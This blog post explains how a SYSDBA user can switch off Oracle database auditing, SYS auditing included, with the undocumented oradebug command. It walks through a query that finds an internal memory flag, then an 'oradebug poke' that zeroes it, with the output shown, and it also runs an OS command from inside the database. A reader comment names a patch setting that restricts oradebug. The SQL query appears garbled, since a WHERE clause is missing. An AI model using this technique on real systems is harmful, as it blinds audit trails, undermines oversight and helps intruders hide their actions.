in 2011 Laszlo Toth Show some Oracle tricks to disable Auditing In Oracle Database included with SYS auditing using simple command Called oradebug, Just as note oradebug is undocumented in all oracle versions and if you have sysdba role privileges you can do a lot of things with this command :
the below is the demonstration :
sqlplus / as sysdba
SQL> — get the offset for oradebug
SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
and fsv.ksmfsnam like ‘kzaflg_%’;
KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001
SQL> show parameter audit;
NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_trail string DB, EXTENDED
SQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000
Just as note with oradebug you Audit vault become useless. another tricks that we can use oradebug to call Database command using OS 🙂
SQL> oradebug call system “ls -la >/tmp/hacktivity.txt”
Published by Osama Mustafa
Osama considered as one of the leaders in Cloud technology, DevOps and database in the Middle-East. I have more than ten years of experience within the industry. moreover, certfied 4x AWS , 4x Azure and 6x OCI, have also obtained database certifications for multiple providers.
In addition to having experience with Oracle database and Oracle products, such as middle-ware, OID, OAM and OIM, I have gained substantial knowledge with different databases.
Currently, I am architecting and implementing Cloud and DevOps. On top of that, I'm providing solutions for companies that allow them to implement the solutions and to follow the best practices.
View all posts by Osama Mustafa
2 thoughts on “Disable Auditing Using Oradebug”
Hi, there is possibility to disable oradebug in 188.8.131.52 (with Patch 15964729) with the parameter “_fifteenth_spare_parameter”. With the parameter value restricted is not more possible to execute poke, setvar, call, etc.
Thanks for sharing